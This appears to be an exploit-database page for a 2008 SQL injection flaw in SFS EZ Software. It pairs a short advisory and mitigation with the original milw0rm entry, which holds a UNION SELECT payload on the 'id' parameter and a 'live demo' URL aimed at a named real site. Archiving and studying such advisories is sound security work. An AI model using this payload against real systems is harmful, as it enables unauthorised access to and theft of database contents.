header-logo
Suggest Exploit
vendor:
SFS EZ Software
by:
x0r
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SFS EZ Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:sfs_ez_software:sfs_ez_software
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SFS EZ Software SQL Injection Vulnerability

An SQL injection vulnerability exists in SFS EZ Software. An attacker can exploit this vulnerability to inject malicious SQL queries into the application, allowing them to access, modify, or delete sensitive data from the database. The vulnerability is due to insufficient input validation of the 'id' parameter in the 'software-description.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious 'id' parameter value. This will cause the application to execute the malicious SQL query and return the results to the attacker.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

-=====================================-
Application : SFS EZ  Software
Risk : High
FOund By: x0r
-=====================================-

Exploit: software/software-description.php?id=-5 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

Live Demo:
http://www.turnkeyzone.com/demos/software/software-description.php?id=-5%20union%20all%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

-=EOF=-

# milw0rm.com [2008-10-31]

Navigation

Suggest Exploit

Services By CQR